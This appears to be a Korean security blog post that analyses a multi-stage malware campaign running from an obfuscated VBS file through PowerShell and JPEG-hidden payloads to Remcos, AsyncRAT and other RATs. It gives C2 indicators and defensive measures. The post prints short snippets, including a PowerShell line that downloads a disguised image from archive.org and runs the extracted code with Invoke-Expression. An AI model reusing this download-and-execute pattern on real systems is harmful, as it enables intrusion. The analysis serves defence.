최근 보안 연구자들이 발견한 고도로 정교한 악성코드 캠페인이 보안 업계를 긴장시키고 있어요. 이 공격은 Visual Basic Script (VBS)를 시작으로 PowerShell, 이미지 파일 내 악성코드, 그리고 RAT(Remote Access Trojan)까지 다단계로 이어지는 고난이도 감염 체계를 갖추고 있어요. 😨
이번 캠페인의 핵심에는 "sostener.vbs"라는 파일이 있습니다. 스페인어로 '지속하다'라는 뜻인데요, 그 이름처럼 이 스크립트는 지속적이고 집요한 침투를 위한 첫걸음을 내딛는 역할을 하죠.
🔍 주요 특징 요약
- 16개의 공개 디렉토리에서 발견된 오픈 디렉토리 기반 악성코드 배포
- 감염 초기 VBS 파일 → PowerShell → 원격 RAT 다운로드
- 사용하는 RAT: Remcos, LimeRAT, AsyncRAT, DCRat
- 악성코드는 JPEG 이미지나 Paste 서비스에 숨겨져 있음
- DuckDNS 기반 C2 서버와 IP 회전을 통한 탐지 회피
- Bitbucket 커밋 기록을 통해 유출된 이메일 계정까지 등장
📦 감염 플로우: 3단계로 구성된 공격 시나리오
1️⃣ 1단계: VBS 파일(sostener.vbs) 실행
공격은 이메일 첨부파일 또는 오픈 디렉토리에서 사용자가 "sostener.vbs"를 다운로드해 실행하는 것으로 시작돼요. 이 파일은 심하게 난독화되어 있어 일반 텍스트 에디터로 열어도 무슨 내용인지 거의 알아볼 수 없어요.
📌 예시 코드:
Dim b64 : b64 = "TVqQAAMAAAAEAAAA//8AALg...==" ' Base64로 인코딩된 PowerShell
Set objShell = CreateObject("WScript.Shell")
objShell.Run DecodeAndExecute(b64)이 VBS는 내부에 숨겨진 Base64 문자열을 디코딩하여 PowerShell 스크립트를 동적으로 메모리에 생성합니다.
2️⃣ 2단계: PowerShell 스크립트가 외부에서 페이로드 다운로드
이제 PowerShell 스크립트가 동작하면서, 이미지 파일로 위장한 악성 페이로드를 다운로드합니다. 대표적인 위치는:
- Internet Archive (archive[.]org) → JPEG 파일에 Base64 코드 숨김
- paste[.]ee, gofile[.]io 같은 텍스트/파일 공유 서비스
$jpeg = Invoke-WebRequest -Uri "https://archive.org/download/softbanner.jpg"
$code = Extract-Base64($jpeg.Content)
Invoke-Expression $code위처럼 정상 이미지처럼 보이지만 실제론 악성 스크립트가 포함된 JPEG 파일에서 Base64 코드를 추출해 실행합니다. 완전히 은닉된 방식이죠! 👻
3️⃣ 3단계: 메모리 인젝션 + RAT 실행
마지막 단계에서는 메모리 인젝터가 동작하면서 RAT를 메모리에 삽입해 실행합니다. 이때 사용되는 RAT는 아래와 같습니다:
- Remcos : 고급 원격 제어 기능, 키로깅, 화면 캡처 등
- AsyncRAT : 오픈소스 기반 RAT로 실시간 제어 및 C2 통신
- DCRat : 러시아 기반 RAT로 다양한 모듈 지원
- LimeRAT : 데이터 탈취, 랜섬웨어 기능 내장
이 모든 과정은 디스크에 파일을 거의 남기지 않고, 탐지 우회를 최대한 고려해 설계되었어요.
🌐 C2 인프라: DuckDNS로 회전하며 숨어다닌다
공격자는 DuckDNS 같은 무료 동적 DNS 서비스를 이용해 C2 서버 IP를 계속 변경해요. 탐지 도구가 특정 IP를 차단해도 DNS 레코드만 바꾸면 즉시 회피할 수 있죠.
📌 대표적인 도메인:
- rem25rem[.]duckdns[.]org
- sosten38999[.]duckdns[.]org
📌 관련 IP 주소:
- 186[.]169.80.199 → Remcos C2
- 193[.]23.3.29 → Remcos 운영
- 213[.]209.150.22 → DCRat 지원
게다가 여러 악성코드가 같은 인증서, 같은 C2 서버를 공유하고 있어, 이는 하나의 통합된 운영 인프라일 가능성을 높입니다.
🕵️ 의심스러운 단서도 발견됨
이 캠페인을 조사하던 중, 연구진은 Bitbucket에 올라온 커밋 로그에서 shadowgamer5628@gmail.com이라는 이메일이 노출된 걸 발견했어요. 아직 확정된 바는 없지만, 공격자 신원을 추적하는 단서가 될 수도 있겠죠. 🕵️♂️
🛡️ 사용자와 기업이 할 수 있는 대응책은?
✅ 사용자
- .vbs, .hta, .ps1, .lnk 등 스크립트 계열 파일은 절대 실행 금지
- 이미지 파일도 실행되면 의심해야 해요! 특히 아카이브나 공유 사이트에서 받은 JPEG
- 브라우저 확장 프로그램 허용 범위 최소화
✅ 기업 보안팀
- EDR/XDR 솔루션에서 powershell.exe, wscript.exe의 이상 실행 이력 분석
- DuckDNS 도메인 자동 차단 정책 수립
- Outbound HTTP/HTTPS 통신 로그 모니터링 (archive.org, paste.ee 등)
- 메모리 기반 인젝션 탐지 룰 설정 (Sysmon + Sigma 룰 활용)
🧩 마무리 정리
| 항목 | 내용 |
| 초기 스크립트 | sostener.vbs (난독화됨) |
| 중간 단계 | Base64 → PowerShell 생성 |
| 페이로드 위치 | 이미지(JPEG), paste 서비스 |
| 최종 페이로드 | Remcos, AsyncRAT, DCRat 등 |
| C2 통신 | DuckDNS + IP 회전 |
| 도메인 예시 | rem25rem[.]duckdns[.]org |
| 이메일 노출 | shadowgamer5628@gmail.com |
📢 결론: VBS, PowerShell, JPEG까지 다중 위장한 최신 위협
이번 공격 캠페인은 단순한 이메일 피싱이나 스크립트 실행을 넘어서, 복잡한 다단계 공격 구조와 숨겨진 페이로드, 고도화된 RAT 조합으로 이루어진 정밀 사이버 공격이에요.
이처럼 전통적인 보안 시스템을 우회할 수 있는 정교한 설계가 늘어나고 있기 때문에, 조직과 개인 모두가 더욱 적극적인 대응이 필요한 시점입니다. 👊
'CyberSecurity > Security🔐' 카테고리의 다른 글
| 🐾 중국 APT의 ‘LapDogs’ 캠페인 – 1,000개 이상 라우터에 몰래 심어진 백도어 ORB 네트워크 실체 (4) | 2025.06.25 |
|---|---|
| 🚨 sslh에서 발견된 치명적 취약점 2건! 이제는 DoS 공격도 한 줄 코드로 가능? (0) | 2025.06.22 |
| 🐍 KimJongRAT의 귀환?! 암호화폐 노리는 최신 변종 2종 주의보 (3) | 2025.06.18 |
| 😱 ClickFix 변종 ‘LightPerlGirl’ 등장! 당신도 모르게 PowerShell을 실행하게 만든다고? (5) | 2025.06.18 |
| 🔎 JFrog, PyPI에서 고도화된 악성 패키지 발견!chimera-sandbox-extensions, 기업 인프라 타깃 공격 사례 분석 (0) | 2025.06.17 |